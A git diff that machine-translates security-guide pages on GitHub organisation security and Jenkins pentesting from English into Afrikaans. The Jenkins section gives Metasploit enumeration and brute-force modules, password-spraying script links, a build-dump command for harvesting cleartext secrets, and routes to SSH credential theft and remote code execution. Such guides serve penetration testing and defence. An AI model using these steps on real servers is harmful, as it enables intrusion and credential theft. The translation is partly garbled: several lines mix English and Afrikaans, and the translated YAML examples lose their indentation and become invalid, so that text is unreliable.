-- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-- **Write**: Recommended for contributors who **actively push to your project**
-- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **Lees**: Aanbeveel vir **nie-kode bydraers** wat jou projek wil besigtig of bespreek.
+- **Triage**: Aanbeveel vir **bydraers wat proaktief probleme en pull requests moet bestuur** sonder skryftoegang.
+- **Skryf**: Aanbeveel vir bydraers wat **aktief na jou projek stoot**.
+- **Onderhou**: Aanbeveel vir **projekbestuurders wat die repository moet bestuur** sonder toegang tot sensitiewe of vernietigende aksies.
+- **Admin**: Aanbeveel vir mense wat **volledige toegang tot die projek** benodig, insluitend sensitiewe en vernietigende aksies soos om sekuriteit te bestuur of 'n repository te verwyder.
 
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+Jy kan **die toestemmings** van elke rol in hierdie tabel vergelyk [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
 
-You can also **create your own roles** in _https://github.com/organizations/\<org_name>/settings/roles_
+Jy kan ook **jou eie rolle skep** in _https://github.com/organizations/\<org_name>/settings/roles_
 
-### Teams
+### Spanne
 
-You can **list the teams created in an organization** in _https://github.com/orgs/\<org_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+Jy kan **die spanne wat in 'n organisasie geskep is lys** in _https://github.com/orgs/\<org_name>/teams_. Let daarop dat jy toegang tot die spanne wat kinders van ander spanne is, moet hê deur elke ouer span te benader.
 
-### Users
+### Gebruikers
 
-The users of an organization can be **listed** in _https://github.com/orgs/\<org_name>/people._
+Die gebruikers van 'n organisasie kan **gelys** word in _https://github.com/orgs/\<org_name>/people._
 
-In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+In die inligting van elke gebruiker kan jy die **spanne waarvan die gebruiker 'n lid is**, en die **repos waartoe die gebruiker toegang het** sien.
 
-## Github Authentication
+## Github Verifikasie
 
-Github offers different ways to authenticate to your account and perform actions on your behalf.
+Github bied verskillende maniere om jou rekening te verifieer en aksies namens jou uit te voer.
 
-### Web Access
+### Webtoegang
 
-Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+Deur **github.com** te benader, kan jy aanmeld met jou **gebruikersnaam en wagwoord** (en 'n **2FA moontlik**).
 
-### **SSH Keys**
+### **SSH Sleutels**
 
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+Jy kan jou rekening met een of verskeie publieke sleutels konfigureer wat die verwante **private sleutel toelaat om aksies namens jou uit te voer.** [https://github.com/settings/keys](https://github.com/settings/keys)
 
-#### **GPG Keys**
+#### **GPG Sleutels**
 
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+Jy **kan nie die gebruiker met hierdie sleutels naboots nie**, maar as jy dit nie gebruik nie, kan dit moontlik wees dat jy **ontdek word vir die stuur van verbintenisse sonder 'n handtekening**. Leer meer oor [waaksaamheidsmodus hier](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
 
-### **Personal Access Tokens**
+### **Persoonlike Toegangstokens**
 
-You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+Jy kan 'n persoonlike toegangstoken genereer om **'n toepassing toegang tot jou rekening te gee**. Wanneer jy 'n persoonlike toegangstoken skep, moet die **gebruiker** die **toestemmings** spesifiseer wat die **token** sal hê. [https://github.com/settings/tokens](https://github.com/settings/tokens)
 
-### Oauth Applications
+### Oauth Toepassings
 
-Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+Oauth toepassings mag jou om toestemmings **te vra om 'n deel van jou github inligting te bekom of om jou na te boots** om sekere aksies uit te voer. 'n Algemene voorbeeld van hierdie funksionaliteit is die **aanmeld met github knoppie** wat jy dalk in sommige platforms vind.
 
-- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-- You can see third party access of applications in an **organization** in _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
+- Jy kan **jou eie** **Oauth toepassings** in [https://github.com/settings/developers](https://github.com/settings/developers) skep.
+- Jy kan al die **Oauth toepassings wat toegang tot jou rekening het** in [https://github.com/settings/applications](https://github.com/settings/applications) sien.
+- Jy kan die **skoppe wat Oauth Apps kan vra** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) sien.
+- Jy kan derdeparty toegang van toepassings in 'n **organisasie** in _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_ sien.
 
-Some **security recommendations**:
+Sommige **sekuriteitsaanbevelings**:
 
-- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
-- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- 'n **OAuth App** moet altyd **optree as die geverifieerde GitHub gebruiker oor die hele GitHub** (byvoorbeeld, wanneer gebruikerskennisgewings verskaf word) en met toegang slegs tot die gespesifiseerde skoppe.
+- 'n OAuth App kan as 'n identiteitsverskaffer gebruik word deur 'n "Aanmeld met GitHub" vir die geverifieerde gebruiker in te skakel.
+- **Moet nie** 'n **OAuth App** bou as jy wil hê jou toepassing moet op 'n **enkele repository** optree nie. Met die `repo` OAuth skop, kan OAuth Apps **optree op \_alle**\_\*\* van die geverifieerde gebruiker se repositories\*\*.
+- **Moet nie** 'n OAuth App bou om as 'n toepassing vir jou **span of maatskappy** op te tree nie. OAuth Apps verifieer as 'n **enkele gebruiker**, so as een persoon 'n OAuth App vir 'n maatskappy skep om te gebruik, en dan verlaat hulle die maatskappy, sal niemand anders toegang daartoe hê nie.
+- **Meer** in [hier](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
 
-### Github Applications
+### Github Toepassings
 
-Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+Github toepassings kan om toestemmings vra om **toegang tot jou github inligting te verkry of om jou na te boots** om spesifieke aksies oor spesifieke hulpbronne uit te voer. In Github Apps moet jy die repositories spesifiseer waartoe die app toegang sal hê.
 
-- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-- The GitHub App should **connect to a personal account or an organisation**.
-- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
-- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-- You can see installed apps in an **organization** in _https://github.com/organizations/\<org_name>/settings/installations_
+- Om 'n GitHub App te installeer, moet jy 'n **organisasie-eienaar wees of admin toestemmings** in 'n repository hê.
+- Die GitHub App moet **verbinde met 'n persoonlike rekening of 'n organisasie**.
+- Jy kan jou eie Github toepassing in [https://github.com/settings/apps](https://github.com/settings/apps) skep.
+- Jy kan al die **Github toepassings wat toegang tot jou rekening het** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) sien.
+- Dit is die **API Eindpunte vir Github Toepassings** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Afhangende van die toestemmings van die App sal dit in staat wees om sommige van hulle te benader.
+- Jy kan geïnstalleerde apps in 'n **organisasie** in _https://github.com/organizations/\<org_name>/settings/installations_ sien.
 
-Some security recommendations:
+Sommige sekuriteitsaanbevelings:
 
-- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-- Make sure the GitHub App integrates with **specific repositories**.
-- The GitHub App should **connect to a personal account or an organisation**.
-- Don't expect the GitHub App to know and do everything a user can.
-- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- 'n GitHub App moet **aksies onafhanklik van 'n gebruiker neem** (tenzij die app 'n [gebruiker-naar-bediener](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token gebruik). Om gebruiker-naar-bediener toegangstokens veiliger te hou, kan jy toegangstokens gebruik wat na 8 uur verval, en 'n verfrissingstoken wat vir 'n nuwe toegangstoken omgeruil kan word. Vir meer inligting, sien "[Verfrissing van gebruiker-naar-bediener toegangstokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+- Maak seker dat die GitHub App integreer met **spesifieke repositories**.
+- Die GitHub App moet **verbinde met 'n persoonlike rekening of 'n organisasie**.
+- Moet nie verwag dat die GitHub App alles weet en doen wat 'n gebruiker kan nie.
+- **Moet nie 'n GitHub App gebruik as jy net 'n "Aanmeld met GitHub" diens nodig het nie**. Maar 'n GitHub App kan 'n [gebruiker identifikasievloei](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) gebruik om gebruikers in te teken _en_ ander dinge te doen.
+- Moet nie 'n GitHub App bou as jy _net_ wil optree as 'n GitHub gebruiker en alles wil doen wat daardie gebruiker kan doen nie.
+- As jy jou app met GitHub Actions gebruik en workflow lêers wil wysig, moet jy namens die gebruiker verifieer met 'n OAuth token wat die `workflow` skop insluit. Die gebruiker moet admin of skryftoestemming hê tot die repository wat die workflow lêer bevat. Vir meer inligting, sien "[Begrip van skoppe vir OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+- **Meer** in [hier](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
 
 ### Github Actions
 
-This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+Dit **is nie 'n manier om in github te verifieer nie**, maar 'n **kwaadwillige** Github Action kan **ongemagtigde toegang tot github** verkry en **afhangende** van die **privileges** wat aan die Aksie gegee word, kan verskeie **verskillende aanvalle** uitgevoer word. Sien hieronder vir meer inligting.
 
-## Git Actions
+## Git Aksies
 
-Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
+Git aksies laat toe om die **uitvoering van kode te outomatiseer wanneer 'n gebeurtenis plaasvind**. Gewoonlik is die kode wat uitgevoer word **op een of ander manier verwant aan die kode van die repository** (miskien 'n docker houer bou of kyk of die PR nie geheime bevat nie).
 
-### Configuration
+### Konfigurasie
 
-In _https://github.com/organizations/\<org_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+In _https://github.com/organizations/\<org_name>/settings/actions_ is dit moontlik om die **konfigurasie van die github aksies** vir die organisasie te kontroleer.
 
-It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+Dit is moontlik om die gebruik van github aksies heeltemal te verbied, **alle github aksies toe te laat**, of net sekere aksies toe te laat.
 
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
+Dit is ook moontlik om te konfigureer **wie goedkeuring nodig het om 'n Github Aksie te laat loop** en die **toestemmings van die GITHUB_TOKEN** van 'n Github Aksie wanneer dit uitgevoer word.
 
-### Git Secrets
+### Git Geheime
 
-Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
-
-These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+Github Aksie benodig gewoonlik 'n soort geheime om met github of derdeparty toepassings te kommunikeer. Om te **verhoed dat hulle in duidelike teks** in die repo geplaas word, laat github toe om hulle as **Geheime** te plaas.
 
+Hierdie geheime kan **vir die repo of vir die hele organisasie** geconfigureer word. Dan, om die **Aksie toegang tot die geheim te gee**, moet jy dit soos volg verklaar:
 ```yaml
 steps:
-  - name: Hello world action
-    with: # Set the secret as an input
-      super_secret:${{ secrets.SuperSecret }}
-    env: # Or as an environment variable
-      super_secret:${{ secrets.SuperSecret }}
+- name: Hello world action
+with: # Set the secret as an input
+super_secret:${{ secrets.SuperSecret }}
+env: # Or as an environment variable
+super_secret:${{ secrets.SuperSecret }}
 ```
-
-#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
-
+#### Voorbeeld met Bash <a href="#example-using-bash" id="example-using-bash"></a>
 ```yaml
 steps:
-  - shell: bash
-    env: SUPER_SECRET:${{ secrets.SuperSecret }}
-    run: |
-      example-command "$SUPER_SECRET"
+- shell: bash
+env: SUPER_SECRET:${{ secrets.SuperSecret }}
+run: |
+example-command "$SUPER_SECRET"
 ```
-
 > [!WARNING]
-> Secrets **can only be accessed from the Github Actions** that have them declared.
+> Geheimnisse **kan slegs vanaf die Github Actions** wat hulle verklaar het, toeganklik wees.
 
-> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+> Sodra dit in die repo of die organisasies gekonfigureer is, **sal gebruikers van github nie weer toegang tot hulle hê nie**, hulle sal net in staat wees om **hulle te verander**.
 
-Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+Daarom is die **enigste manier om github geheimnisse te steel, om toegang te hê tot die masjien wat die Github Action uitvoer** (in daardie scenario sal jy slegs toegang hê tot die geheimnisse wat vir die Action verklaar is).
 
-### Git Environments
-
-Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
+### Git Omgewings
 
+Github laat toe om **omgewings** te skep waar jy **geheimnisse** kan stoor. Dan kan jy die github action toegang gee tot die geheimnisse binne die omgewing met iets soos:
 ```yaml
 jobs:
-  deployment:
-    runs-on: ubuntu-latest
-    environment: env_name
+deployment:
+runs-on: ubuntu-latest
+environment: env_name
 ```
-
-You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
-It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
+You can configure an environment to be **accessed** by **alle takke** (default), **slegs beskermde** takke of **spesifiseer** watter takke toegang kan hê.\
+Dit kan ook 'n **aantal vereiste hersienings** stel voordat **uitvoering** van 'n **aksie** met 'n **omgewing** plaasvind of **wag** vir 'n **tyd** voordat ontplooiings voortgaan.
 
 ### Git Action Runner
 
-A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
+A Github Action can be **executed inside the github environment** or can be executed in a **derdeparty-infrastruktuur** geconfigureer deur die gebruiker.
 
-Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
+Verskeie organisasies sal toelaat dat Github Actions in 'n **derdeparty-infrastruktuur** gedraai word, aangesien dit gewoonlik **goedkoper** is.
 
 You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\<org_name>/settings/actions/runners_
 
@@ -214,7 +208,7 @@ If all actions (or a malicious action) are allowed a user could use a **Github a
 > A **malicious Github Action** run could be **abused** by the attacker to:
 >
 > - **Steal all the secrets** the Action has access to
-> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
+> - **Move laterally** if the Action is executed inside a **derdeparty-infrastruktuur** waar die SA-token wat gebruik word om die masjien te laat loop, toegang kan verkry (waarskynlik via die metadata-diens)
 > - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
 
 ## Branch Protections
@@ -229,11 +223,11 @@ The **branch protections of a repository** can be found in _https://github.com/\
 Different protections can be applied to a branch (like to master):
 
 - You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
-  - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
-  - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
-  - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
-  - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
-  - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
+- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
+- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
+- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
+- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
+- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
 - **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
 - **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
 - **Require signed commits**. The commits need to be signed.
@@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master):
 - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 4dfba3ff3..95a338beb 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -2,29 +2,25 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+Jenkins is 'n hulpmiddel wat 'n eenvoudige metode bied om 'n **deurlopende integrasie** of **deurlopende aflewering** (CI/CD) omgewing vir byna **enige** kombinasie van **programmering tale** en bronkode-repositories te vestig met behulp van pipelines. Boonop outomatiseer dit verskeie roetine ontwikkelings take. Terwyl Jenkins nie die **noodsaaklikheid om skripte vir individuele stappe te skep** verwyder nie, bied dit 'n vinniger en meer robuuste manier om die hele reeks van bou-, toets- en ontplooiing gereedskap te integreer as wat 'n mens maklik handmatig kan opstel.
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-## Unauthenticated Enumeration
-
-In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
+## Ongeoutentiseerde Enumerasie
 
+Om te soek na interessante Jenkins-bladsye sonder outentisering soos (_/people_ of _/asynchPeople_, dit lys die huidige gebruikers) kan jy gebruik maak van:
 ```
 msf> use auxiliary/scanner/http/jenkins_enum
 ```
-
-Check if you can execute commands without needing authentication:
-
+Kontroleer of jy opdragte kan uitvoer sonder om te hoef te autentiseer:
 ```
 msf> use auxiliary/scanner/http/jenkins_command
 ```
-
-Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
+Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **gebruikersname**.
 
 You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
 
@@ -38,7 +34,7 @@ https://github.com/gquere/pwn_jenkins
 
 ## Login
 
-In the basic information you can check **all the ways to login inside Jenkins**:
+In the basic information you can check **alle maniere om in Jenkins aan te meld**:
 
 {{#ref}}
 basic-jenkins-information.md
@@ -46,267 +42,251 @@ basic-jenkins-information.md
 
 ### Register
 
-You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+You will be able to find Jenkins instances that **toelaat dat jy 'n rekening skep en daarin aanmeld. So eenvoudig soos dit.**
 
 ### **SSO Login**
 
-Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+Also if **SSO** **funksionaliteit**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
 
 ### Bruteforce
 
-**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
-
+**Jenkins** lacks **wagwoordbeleid** and **gebruikersnaam bruteforce mitigering**. It's essential to **brute-force** users since **swak wagwoorde** or **gebruikersname as wagwoorde** may be in use, even **omgekeerde gebruikersname as wagwoorde**.
 ```
 msf> use auxiliary/scanner/http/jenkins_login
 ```
+### Wachtwoord spuit
 
-### Password spraying
+Gebruik [hierdie python skrip](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) of [hierdie powershell skrip](https://github.com/chryzsh/JenkinsPasswordSpray).
 
-Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+### IP Witlys Bypass
 
-### IP Whitelisting Bypass
+Baie organisasies kombineer **SaaS-gebaseerde bronbeheer (SCM) stelsels** soos GitHub of GitLab met 'n **interne, self-gehoste CI** oplossing soos Jenkins of TeamCity. Hierdie opstelling laat CI stelsels toe om **webhook-gebeurtenisse van SaaS bronbeheer verskaffers** te ontvang, hoofsaaklik om pyplyn take te aktiveer.
 
-Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+Om dit te bereik, **witlys** organisasies die **IP reekse** van die **SCM platforms**, wat hulle toelaat om toegang te verkry tot die **interne CI stelsel** via **webhooks**. Dit is egter belangrik om te noem dat **enigeen** 'n **rekening** op GitHub of GitLab kan skep en dit kan konfigureer om 'n **webhook** te aktiveer, wat moontlik versoeke na die **interne CI stelsel** kan stuur.
 
-To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+Kontroleer: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
 
-Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+## Interne Jenkins Misbruik
 
-## Internal Jenkins Abuses
-
-In these scenarios we are going to suppose you have a valid account to access Jenkins.
+In hierdie scenario's gaan ons aanvaar dat jy 'n geldige rekening het om toegang tot Jenkins te verkry.
 
 > [!WARNING]
-> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+> Afhangende van die **Magtigings** meganisme wat in Jenkins geconfigureer is en die toestemming van die gecompromitteerde gebruiker, **kan jy dalk of dalk nie die volgende aanvalle uitvoer nie.**
 
-For more information check the basic information:
+Vir meer inligting, kyk na die basiese inligting:
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-### Listing users
+### Lys van gebruikers
 
-If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+As jy toegang tot Jenkins verkry het, kan jy ander geregistreerde gebruikers lys in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
 
-### Dumping builds to find cleartext secrets
-
-Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
+### Dumping boue om duidelike teks geheime te vind
 
+Gebruik [hierdie skrip](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) om bou konsoluitvoer en bou omgewingsveranderlikes te dump om hopelik duidelike teks geheime te vind.
 ```bash
 python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
 cd build_dumps
 gitleaks detect --no-git -v
 ```
+### **Steling van SSH Kredensiale**
 
-### **Stealing SSH Credentials**
-
-If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+As die gecompromitteerde gebruiker **genoeg bevoegdhede het om 'n nuwe Jenkins node te skep/wysig** en SSH kredensiale reeds gestoor is om toegang tot ander nodes te verkry, kan hy **daardie kredensiale steel** deur 'n node te skep/wysig en **'n gasheer in te stel wat die kredensiale sal opneem** sonder om die gasheer sleutel te verifieer:
 
 ![](<../../images/image (218).png>)
 
-You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+Jy sal gewoonlik Jenkins ssh kredensiale in 'n **globale verskaffer** (`/credentials/`) vind, so jy kan dit ook dump soos jy enige ander geheim sou dump. Meer inligting in die [**Dumping secrets section**](./#dumping-secrets).
 
 ### **RCE in Jenkins**
 
-Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+Om 'n **shell in die Jenkins bediener** te kry, gee die aanvaller die geleentheid om al die **geheime** en **omgewing veranderlikes** te lek en om **ander masjiene** in dieselfde netwerk te **ontgin** of selfs **cloud kredensiale** te **versamel**.
 
-By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+Standaard sal Jenkins **as SYSTEM loop**. Dus, om dit te kompromitteer sal die aanvaller **SYSTEM bevoegdhede** gee.
 
-### **RCE Creating/Modifying a project**
+### **RCE Skep/Wysig 'n projek**
 
-Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+Skep/Wysig 'n projek is 'n manier om RCE oor die Jenkins bediener te verkry:
 
 {{#ref}}
 jenkins-rce-creating-modifying-project.md
 {{#endref}}
 
-### **RCE Execute Groovy script**
+### **RCE Voer Groovy skrip uit**
 
-You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+Jy kan ook RCE verkry deur 'n Groovy skrip uit te voer, wat dalk minder opmerksaam is as om 'n nuwe projek te skep:
 
 {{#ref}}
 jenkins-rce-with-groovy-script.md
 {{#endref}}
 
-### RCE Creating/Modifying Pipeline
+### RCE Skep/Wysig Pipeline
 
-You can also get **RCE by creating/modifying a pipeline**:
+Jy kan ook **RCE verkry deur 'n pipeline te skep/wysig**:
 
 {{#ref}}
 jenkins-rce-creating-modifying-pipeline.md
 {{#endref}}
 
-## Pipeline Exploitation
+## Pipeline Exploitatie
 
-To exploit pipelines you still need to have access to Jenkins.
+Om pipelines te ontgin moet jy steeds toegang tot Jenkins hê.
 
-### Build Pipelines
+### Bou Pipelines
 
